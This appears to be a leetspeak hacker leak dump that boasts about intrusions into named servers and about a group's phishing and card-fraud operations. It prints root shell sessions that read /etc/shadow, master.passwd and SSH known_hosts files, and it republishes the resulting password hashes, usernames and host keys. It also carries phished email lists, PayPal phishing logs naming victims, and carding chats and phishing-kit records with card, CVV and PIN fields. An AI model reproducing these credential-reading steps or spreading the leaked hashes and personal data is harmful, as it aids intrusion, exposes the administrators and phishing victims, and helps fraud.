IceShaman -> tgo : I've checked the entire IPB source
IceShaman -> tgo : for require/include s
IceShaman -> tgo : and gone through all of them
IceShaman -> tgo : I've checked all the preg_replaces
CcSsNET -> CcSsNET : LC 1145381040.04560
IceShaman -> tgo : checked all eval() assert()
IceShaman -> tgo : checked for system() exec() shell_exec() passthru() etc
CcSsNET -> CcSsNET : LC 1145381100.72560
CcSsNET -> CcSsNET : LC 1145381160.14562
tgo -> IceShaman : wtf
tgo -> IceShaman : ok sorry
tgo -> IceShaman : my isp keeps jumping
tgo -> IceShaman : whot old you about the bug how you know it exists?
IceShaman -> tgo : because someone used it
IceShaman -> tgo : someone managed to write files on HTS
CcSsNET -> CcSsNET : LC 1145381220.21561
IceShaman -> tgo : and they used the same thing on enigmagroup
IceShaman -> tgo : I was told it was a flaw in IPB
IceShaman -> tgo : some people also hacked us 2 days ago
IceShaman -> tgo : saying they're the same people
IceShaman -> tgo : and it's a bug in a php script
IceShaman -> tgo : namely IPB
IceShaman -> tgo : securicore
CcSsNET -> CcSsNET : LC 1145381280.20105
IceShaman -> tgo : and as you know PHP
CcSsNET -> CcSsNET : LC 1145381340.72257
IceShaman -> tgo : I thought I'd ask you if you knew any more holes
IceShaman -> tgo : that could lead to remote execution
tgo -> IceShaman : did you check logs?
IceShaman -> tgo : he used POST
tgo -> IceShaman : to what pages?
IceShaman -> tgo : it isnt any of the functions used to run commands
IceShaman -> tgo : tgo, no idea
tgo -> IceShaman : the logs should say what pages
IceShaman -> tgo : there are no logs
IceShaman -> tgo : I said he used POST
IceShaman -> tgo : POST isn't logged
tgo -> IceShaman : apache logs??
CcSsNET -> CcSsNET : LC 1145381400.07966
IceShaman -> tgo : POST ISNT LOGGED
tgo -> IceShaman : ...
IceShaman -> tgo : if you post data to a form
IceShaman -> tgo : it isnt logged by apache
IceShaman -> tgo : this is basic stuff tgo
IceShaman -> tgo : apachde only logs GET requests
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:53:24 -0600] "POST /pMa/left.php HTTP/1.1" 200 1425
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:53:32 -0600] "POST /pMa/left.php HTTP/1.1" 200 1002
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:54:05 -0600] "POST /pMa/left.php HTTP/1.1" 200 1002
tgo -> IceShaman : 192.168.1.100 - tgo [14/Mar/2006:14:54:29 -0600] "POST /pMa/left.php HTTP/1.1" 200 1347
tgo -> IceShaman : it says the page
tgo -> IceShaman : that will give you a big clue
IceShaman -> tgo : oh ffs
IceShaman -> tgo : no it wont
CcSsNET -> CcSsNET : LC 1145381460.89561
IceShaman -> tgo : none of the data is there dude
IceShaman -> tgo : it's forums
IceShaman -> tgo : you any idea how many people post data an hour?
CcSsNET -> CcSsNET : LC 1145381520.57948
tgo -> IceShaman : dont you have the ip of who did it
tgo -> IceShaman : and idnt you say you had to have admin access?
IceShaman -> tgo : I do
IceShaman -> tgo : no
IceShaman -> tgo : you have to have admin access
IceShaman -> tgo : for a sploit I found
IceShaman -> tgo : while auditing the code
CcSsNET -> CcSsNET : LC 1145381580.95560
tgo -> IceShaman : ah
CcSsNET -> CcSsNET : LC 1145381640.93560
CcSsNET -> CcSsNET : LC 1145381700.67653
IceShaman -> tgo : tried IPs
IceShaman -> tgo : cant see any POST requests at all
IceShaman -> tgo : and the gets are clean
tgo -> IceShaman : hmm
CcSsNET -> CcSsNET : LC 1145381760.32561
CcSsNET -> CcSsNET : LC 1145381820.81560
CcSsNET -> CcSsNET : LC 1145381880.02561
CcSsNET -> CcSsNET : LC 1145381940.38560
CcSsNET -> CcSsNET : LC 1145382000.01481
CcSsNET -> CcSsNET : LC 1145382060.08561
CcSsNET -> CcSsNET : LC 1145382120.94561
CcSsNET -> CcSsNET : LC 1145382180.60561
CcSsNET -> CcSsNET : LC 1145382240.29559
IceShaman -> tgo : nope nothing

4ft3r l1k3 4 m0nthz 0f sn1ff1ng th1z sh1t.. w3 h4v3 c0m3 t0
n0t1c3...

R4V3 H4Z N0 FUQN SK1LL 1N L1F3.

B4Q 2 H4QL0GZ

root@alpha:~# w
08:48:53 up 70 days, 22:08, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
amanda :0 - 08Feb06 ?xdm? 4days 13.71s x-session-manag
root@alpha:~# cat /etc/shadow
root:$1$NVk7VnVj$M0U5yPFdlz/6uNaZoKhZG0:13248:0:99999:7:::
daemon:*:13014:0:99999:7:::
bin:*:13014:0:99999:7:::
sys:*:13014:0:99999:7:::
sync:*:13014:0:99999:7:::
games:*:13014:0:99999:7:::
man:*:13014:0:99999:7:::
lp:*:13014:0:99999:7:::
mail:*:13014:0:99999:7:::
news:*:13014:0:99999:7:::
uucp:*:13014:0:99999:7:::
proxy:*:13014:0:99999:7:::
www-data:*:13014:0:99999:7:::
backup:*:13014:0:99999:7:::
list:*:13014:0:99999:7:::
irc:*:13014:0:99999:7:::
gnats:*:13014:0:99999:7:::
nobody:*:13014:0:99999:7:::
Debian-exim:!:13014:0:99999:7:::
rave:!!:13014:0:99999:7:::
identd:!:13014:0:99999:7:::
sshd:!:13014:0:99999:7:::
mysql:!:13015:0:99999:7:::
The_mystiC:$1$2wdFYnnK$b.6Ijx98d2.i2O1z5AKp80:13015:0:99999:7:::
anope:!:13015:0:99999:7:::
infobot:!:13015:0:99999:7:::
jmoschetti45:$1$c63T/2TL$vR/0DZREM5OlbqKhl0GxZ1:13015:0:99999:7:::
saned:!:13020:0:99999:7:::
gdm:!:13020:0:99999:7:::
messagebus:!:13020:0:99999:7:::
hal:!:13020:0:99999:7:::
amanda:$1$GfvvfyoN$/7eBTzRmPNy1Zj16Jsfpt/:13020:0:99999:7:::
ftp:!:13024:0:99999:7:::
extreme:!:13031:0:99999:7:::
bind:!:13031:0:99999:7:::
cvsweb:!:13106:0:99999:7:::
dylan:$1$Zk.g.LVM$B.5YF4wIe0KoecaptojHC1:13106:0:99999:7:::
cvsd:!:13108:0:99999:7:::
cold:$1$A7n8z05o$9sAQKI6SplM4xqKtSs6vO1:13248:0:99999:7:::
svn:!:13218:0:99999:7:::
root@alpha:~# exit
logout
Connection to rosiello.net closed.

N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! RAVE IS ELITE. PM IS ELITE. N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!!


09.txt -~-~-~ 3th1cz@exploits.cx

dianaco@aol.com
brittk653@aol.com
dianejt@aol.com
gordgerson@aol.com
sallys7138@aol.com
dianesmc@aol.com
bb27588@aol.com
kdailey986@aol.com
dialrep@aol.com
samalibu@aol.com
tomcgordon@aol.com
tomastate@aol.com
gortman@aol.com
dianehm@aol.com
samanauy@aol.com
diana800@aol.com
p



  
dhockey31@aol.com
cluless3@aol.com
pdiddy6734@aol.com

th1s 1s pr3vi3w 0f 3m41l 4ddr3zz3z th3y ph1sh3d..

66.135.213.75 - - [01/Feb/2005:01:30:55 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=Stan@4Focus.com HTTP/1.1" 200 32718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Java/1.4.1_02"
66.135.213.75 - - [01/Feb/2005:01:30:58 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=Stan@4Focus.com HTTP/1.1" 200 32718 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
24.206.73.128 - - [01/Feb/2005:14:30:04 +0200] "GET /www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted] HTTP/1.1" 200 32731 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:05 +0200] "GET /www.paypal.com/us/cgi-bin/css/pp_styles_111402.css HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:06 +0200] "GET /www.paypal.com/us/cgi-bin/css/pp_table_styles.css HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:07 +0200] "GET /www.paypal.com/us/cgi-bin/js/pp_main.js HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:07 +0200] "GET /www.paypal.com/us/cgi-bin/pp_check.js HTTP/1.1" 200 2948 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/scr/pixel.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/logo/paypal_logo.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_request_money.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_on_my_account.gif HTTP/1.1" 200 494 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_send_money.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:08 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/bg.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_merchant_tools.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/P_off_auction_tools.gif HTTP/1.1" 304 - "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/SA_off_overview.gif HTTP/1.1" 200 168 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"
24.206.73.128 - - [01/Feb/2005:14:30:09 +0200] "GET /www.paypal.com/us/cgi-bin/en_US/i/nav/SA_off_withdraw.gif HTTP/1.1" 200 175 "http://83.148.101.122/www.paypal.com/us/cgi-bin/update.php?login_email=larry848@earthlink.net&login_password=[editted]" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.4.2.0; SV1)"


h3r3 1s r3sultz 0f th31r ph1sh1ng [th3r3 w4z lyk3 10000 3ntr13z l1k3 th1z]

Stan@4Focus.com
Stan@4Focus.com
larry848@earthlink.net&login_password=[editted]
larry.barker@honeywell.com&login_password=[editted]
larry@fish-jersey.com&login_password=[editted]
larry.brophy@trintech.com&login_password=[editted]
larez2@juno.com&login_password=[editted]
lare@netvalue.net&login_password=[editted]
larry@churchamerica.org&login_password=[editted]
larry.barker@honeywell.com&login_password=[editted]
larujay@rcn.com&login_password=[editted]
sndrfh@sdhtr.rty&login_password=[editted]
larbet41@juno.com&login_password=[editted]
larry.benedet1@sympatico.ca&login_password=[editted]
yankeegirl9@hotmail.com&login_password=[editted]
larryb@sanantonio.gov&login_password=[editted]
Laraine@comcast.net&login_password=[editted]
thehudsons@verizon.net&login_password=[editted]
joepo@po.com&login_password=[editted]
larry@jnabbottdist.com&login_password=[editted]
larry.montgomery@verizon.net&login_password=[editted]
powermfg@aol.com&login_password=[editted]
larabuttigieg001@hotmail.com&login_password=[editted]
info@mypreneed.com&login_password=[editted]

h3r3 th3y k3pt th3 1mp0rt4nt 1nf0rm4t10n



<PONiC> [19:06:32] <l~|Draupner|> [DRAUPNER] - 1. Games at
draupner.no-ip.org:45093 is UP (login: 760ms ping: N/Ams)
<PONiC> [19:06:36] <l~|Draupner|> [DRAUPNER] - 2. Dvdr at oden.no-ip.org:45093
is UP (login: 1301ms ping: N/Ams)
<PONiC> [19:06:40] <l~|Draupner|> [DRAUPNER] - 3. Mvid,Tv,Xvid at
miming.no-ip.org:45093 is UP (login: 1254ms ping: N/Ams)
<PONiC> [19:06:44] <l~|Draupner|> [DRAUPNER] - 4. Xbox,Ps2 at
daluniz.no-ip.org:45093 is UP (login: 2339ms ping: N/Ams)
<PONiC> [19:06:48] <l~|Draupner|> [DRAUPNER] - 5. Svcd,Swe-svcd at
gram.no-ip.org:45093 is UP (login: 2133ms ping: N/Ams)
<PONiC> [19:06:52] <l~|Draupner|> [DRAUPNER] - 6. MP3 at frej.no-ip.org:45093 is
UP (login: 1170ms ping: N/Ams)
<PONiC> [19:06:55] <l~|Draupner|> [DRAUPNER] - 7. 0DAYS,APPS at
snotra.no-ip.org:45093 is UP (login: 1204ms ping: N/Ams)

l00kz lyk3 th31r sp4mm1ng sh3llz

Mar 09 00:11:23 <|Razor|> email = *************@libero.it
Mar 09 00:11:23 <|Razor|> phone = ****-***-******
Mar 09 00:11:23 <|Razor|> street = *** ***** ***** 36
Mar 09 00:11:23 <|Razor|> city = *******
Mar 09 00:11:23 <|Razor|> state = IMPERIA
Mar 09 00:11:25 <|Razor|> country = Italy
Mar 09 00:11:31 <|Razor|> zip = 18038
Mar 09 00:11:33 <|Razor|> cardholder = ***** *********
Mar 09 00:11:35 <|Razor|> ccnumber = ****************
Mar 09 00:11:37 <|Razor|> expiremonth = 05
Mar 09 00:11:39 <|Razor|> expireyear = 2006
Mar 09 00:11:43 <|Razor|> cvv2 = *******
Mar 09 00:11:45 <|Razor|> bankname = BANCA CARIGE
Mar 09 00:11:47 <|Razor|> bankphone = 0039-184-590611
Mar 09 00:11:49 <|Razor|> are vzemi italianska
Mar 09 00:12:33 <|Razor|> na edna godina sa mi povecheto
Mar 09 00:12:37 <|Razor|> imah edin mnogo bogat arhiv
Mar 09 00:12:39 <|Razor|> okolo 500 karti
Mar 09 00:12:53 <|Razor|> obache kato usetiha che sme krali ot onzi
magazin qvno e imalo mnogo golqma akciq i sa spreni vsichki
Mar 09 00:13:07 <|Razor|> ot nachaloto ot kakto sme gi krali pochti
vsichki gledam po edno vreme spreni
Mar 09 00:13:12 <joffer2> <|Razor|> cvv2 = *******
Mar 09 00:13:23 <|Razor|> 557 e

m0r3 budd13z 0f j0ff3r h3lp h1m w1th CC tr4d1ng

<|Razor|> country = US
<|Razor|> ccmth = 04-Apr
<|Razor|> bcity = Allen
<|Razor|> rname =
<|Razor|> bzip = 75013
<|Razor|> name = D1CK Kahl
<|Razor|> sname =
<|Razor|> ccname = D1CK L Kahl
<|Razor|> phone = XXX-XXX-XXXX
<|Razor|> state = TX
<|Razor|> bstreet = XXX XXXXXXX Dr
<|Razor|> bcountry = US
<|Razor|> city = XXXXX
<|Razor|> cctype = VISA
<|Razor|> ccard = XXXXXXXXXXXXXXXX
<|Razor|> cvv2 = 833
<|Razor|> R1 = NO
<|Razor|> zip = XXXXX
<|Razor|> ccyear = 2006
<|Razor|> email = ******@sbcglobal.net
<|Razor|> street = *** ****** **
<|Razor|> bstate = TX

Username: joffer123
Password: J0FF3R!@
CC: 1232131232132132
Cvv2: 1233
Exp Date(M-D-Y): 01-1-05
PIN: 1243
SSN:
Father Name:
F Dob :
Mother Name:
M Dob :
Spouse Name :
S dob :
Full M :
dob :
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:26am
- using Ebay scam made by RdE & jam3s -

Username: joffer123
Password: J0FF3R!@
CC: 1232131232132132
Cvv2: 1233
Exp Date(M-D-Y): 01-1-05
PIN: 1243
SSN:
Father Name:
F Dob :
Mother Name:
M Dob :
Spouse Name :
S dob :
Full M :
dob :
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:26am
- using Ebay scam made by RdE & jam3s -

Username: joffer123
Password: J0FF3R!@
CC: 1424124124121424
Cvv2: 4214
Exp Date(M-D-Y): 01-1-05
PIN: 1241
SSN:
Full M :
dob :
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:28am


Username: joffer123
Password: J0FF3R!@
CC: 1234561234561234
Cvv2: 1232
Exp Date(M-D-Y): 01-1-05
PIN: 2131
Name on card: asd sad
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 1:29am


Username: joffer123
Password: J0FF3R!@
CC: 1244141241214214
Cvv2: 1421
Exp Date(M-D-Y): 01-2-06
PIN: 4211
Name on card: TEST POSLEDEN
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 85.187.1.208
Date/time: 28.03.2005, 2:31am


Username: joffer123
Password: J0FF3R!@
CC: 3293181539518953
Cvv2: 1234
Exp Date(M-D-Y): 01-1-05
PIN: 1234
Name on card: KOLJO E PEDAL
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: ::1
Date/time: 28.03.2005, 17:36pm


Username: jpollarduk
Password: XXXXXXXXXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 228
Exp Date(M-D-Y): 04-6-07
PIN: 2678
Name on card: XXXXXXXXXXXXXX
First name: XXXXXXXXXXXXXX
Last name:
Company:
Address:
City:
State:
Country:
Postal code:
Phone number: --
Seconday phone: --
IP: 62.252.32.**
Date/time: 29.03.2005, 23:15pm


Username: kerrbear1724
Password: XXXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 745
Exp Date(M-D-Y): 03-31-07
PIN: 8111
Name on card: XXXXXXXXXXXXX
First name: XXXXX
Last name: XXXXX
Company:
Address: XXXXXXXXXXXXXXXXXXXXX
City: Pittsburgh
State: PA
Country:
Postal code: 15210
Phone number: XXX-XXX-XXXX
Seconday phone: --
IP: 151.195.107.**
Date/time: 29.03.2005, 23:28pm


Username: templedoc23
Password: XXXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 611
Exp Date(M-D-Y): 06-6-05
PIN: 0203
Name on card: XXXXXXXXXXXXXX
First name: XXXXXXXX
Last name: XXXX
Company:
Address: XXXXXXXXXXXXXXXXXXXXXXXX
City: Philadelphia
State: PA
Country:
Postal code: 19107
Phone number: XXX-XXX-XXXX
Seconday phone: --
IP: 155.247.166.**
Date/time: 29.03.2005, 23:28pm


Username: osblue
Password: XXXXXXX
CC: XXXXXXXXXXXXXXXX
Cvv2: 623
Exp Date(M-D-Y): 02-29-08
PIN: none
Name on card: XXXXXXXXXXXXX
First name: XXXX
Last name: XXXXXX
Company:
Address: XXXXXXXXXXXXXX
City: armada
State: MI
Country:
Postal code: 48005
Phone number: XXX-XXX-XXXX
Seconday phone: --
IP: 64.136.26.***
Date/time: 29.03.2005, 23:29pm


Username: joffer123
Password: J0FF3R!@
CC: 1111111111111111
Cvv2: 1111
Exp Date(M-D-Y): 04-1-07
PIN: 1111
Name on card: 123333333333333333333333333333
First name: Joffer
Last name: Hristov
Company:
Address: Bukston
City: Sofia
State: Sofia
Country:
Postal code: 1618
Phone number: 359888546737--
Seconday phone: --
IP: 66.92.22.164
Date/time: 29.03.2005, 23:42pm


j0ff3r'z db 0f st0ld3n sh1t.

Account Nickname: Checking
Account Type/Number: INTEREST MAXIMIZER ACCOUNT-2068
Type: Debit
Transaction Description: Online Banking transfer to Sav **** Conf# **********;
Rodgers, *******
Date: 04/12/2005
Amount: $1,000.00

j0ff3r us1ng th3 st0ld3n 4cc0untz.

-~-~-~-~

truzt exploits.cx / securitydot.net! fr0m th31r f4q l0c4t3d @
http://exploits.cx/?path=/FAQ/&cid=6#11

"
How do we know your not just selling the exploits to
DDoSers/Spammers/Extortionists?

We are not selling the private exploits we buy to anyone! We do realize however
that gaining your trust will take time.Unfortunately proving this for a fact is
impossible.
"


d1spr0v1ng 1t w4z 4z 34zy 4z 0wn1ng th3z3 dumb b1tch3z.


10.txt -~-~-~ ethics@idefense.com

n0w l3tz ch3ck 0ut h0w idefense c0mp4r3z.

# uname -a
Linux srv01-sun.seifried.org 2.6.9-34.0.2.EL #1 Fri Jun 30 10:22:45 EDT 2006 x86_64 x86_64 x86_64 GNU/Linux
# w
01:45:43 up 5 days, 29 min, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
# ls -al /home
total 24
drwxr-xr-x 3 root root 4096 Feb 20 05:17 .
drwxr-xr-x 24 root root 4096 Jul 13 01:16 ..
drwx------ 5 seifadm seifadm 4096 May 31 02:19 seifadm
# ssh fw01.seifried.org
root@fw01.seifried.org's Password:
# grep -v '*' /etc/master.passwd | grep -v '!'
root:$2a$08$y1pmAsmDkwNWN7W5qacH0OgdwdOkxKr.TdtzboIDRcwqW9Y/oKaRC:0:0:daemon:0:0:Charlie &:/root:/bin/ksh
seifadm:$2a$06$./VaGlR.ESmUaKGln1wUZe8yTfoJczQzXpT1h.jUqDYAoulnhdmk2:1000:1000::0:0:seifadm:/home/seifadm:/bin/ksh
dhartmei:$2a$06$EbtJldePdQwD8ajM4nU45ummi8UuFHyyd6j59fJgW4sDtU5qKpoBe:1001:1001::0:0:dhartmei:/home/dhartmei:/bin/ksh
vdanen:$2a$06$R9uNq4qNO85xEVIdyTFmvuDPGWk2CcbByLe562sewIX8.qGJW88Ym:1002:1002::0:0:Vincent Danen:/home/vdanen:/bin/ksh
# ssh fw00.seifried.org
root@fw00.seifried.org's Password:
# grep -v '*' /etc/master.passwd | grep -v '!'
root:$2a$08$IolfxFNJ2/ijWriQ1B2xwu4nVUbfVH4kLQfQrhAl8DTGmU0EXDTmC:0:0:daemon:0:0:Kurt Seifried,,,:/root:/bin/ksh
seifadm:$2a$06$9YzLc71Cadc.NLA63Mz0duCaSfIUsKhQpwzemu9HoZzVVcaZpIrQi:1000:1000::0:0:SEIFRIED ADMIN:/home/seifadm:/bin/ksh
dhartmei:$2a$06$EbtJldePdQwD8ajM4nU45ummi8UuFHyyd6j59fJgW4sDtU5qKpoBe:1001:1001::0:0:dhartmei:/home/dhartmei:/bin/ksh
vdanen:$2a$06$xa06iQRtNd8RKcSLEuG9M.Z8FEAG95PscWDClhtIbdfuoy8r1paN2:1002:1002::0:0:Vincent Danen:/home/vdanen:/bin/ksh
# cat /root/.ssh/known_hosts
fw01,216.234.189.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv01,216.234.189.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt8JHM7YHSlM4OIV87+tu2/eDY8ImO/k5uPsJomIqlC7/hN45SXsZ07gLQ8OEBmNPyN+bNWP2TRvjykcBsSeVIAy8jdZE1yt5lT4gGAOGyfawZwBh1EFqCnHoECqc2u3Cha1bLV+jDNAwzTj5oQrv9DMcBo8T3kuDuovL/DJJLjk=
fw01.seifried.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv05,216.234.189.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApEmVQUZUs6ajW/6Kyddfj3zMa60gzYmbBTuDELy1I9bfYHO6D4835HlJnT3cNovuACoMrzs9y0tJGANvox5rJ20Slm6KE2PH0twS0lZcd4cOMtKhOUcGuch/aXTNnGDhrsFQNf3PHxKRuM0AT2qjvLLlghIhYntLSrergb7CZT0=
srv00,216.234.189.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuL/2zr2HSNfyBDuuHFoCbvS8Q/rZeCXFTMWZOPdvMEFZ6wve9phCPb1dwEj7kOlqTpZ+iq9uH/LCPfdVjaBIOAcN4BrZRuv3ABIZZ3MndkD+Q5kfoTZ7LUYgivladV+AYwscyxjU3LvPh4AFM/HrrQBJvVTN39ty/qNOmPh89sc=
undeadly.org,66.51.111.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtRx9+LNuWKXBPRsyMWk3Snzzrcft91cWtQc3d8i+qccY42Rz2QAFPuxLeBiOYwE0EI0TL/t3gmhML5ywktFN8jhWNk+m/hLSYTVOZ4ckXg37uJLdJRIx3KlybJhlGuXADYCDcjIfj4cNOnqW9KHwJmFIc/X7PoBXojYZAXlXk90ELl4csAwcDCZRInh49vEaRHE4jj/yvgpXrZBErTFZgmY21Btnbmj1olRRs2HfDd60t/BzGXQs9P6gI2EP01ONF9OWZAX+CNRC/ru+yVR/mVx0i4Ah5Osd5GZIhxMQLLjYW/HOd/+weIPc09xv4io+01VyH2zmOOf/rOAYJcBTSQ==
sputnik.firstfoundation.ca,142.179.165.115 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv8//etsP6DIW3wKQl0ggaGrLb9Y2JR9CzW6ADFyDZwWwIpBZ7dE+0dYN4LeyrXWhVUnX1QDY5z8CpI6zoLpmrmKFMyoxE+fkfqFAbQeqcjJwnf77XHYaqEYYcOyssZFD67M/hu9LmcJXZ725hWmCLZH3SNblS1wVqIBXuv7ZNkk=
# ssh srv00.seifried.org
root@srv00.seifried.org's Password:
# cat root/.ssh/known_hosts
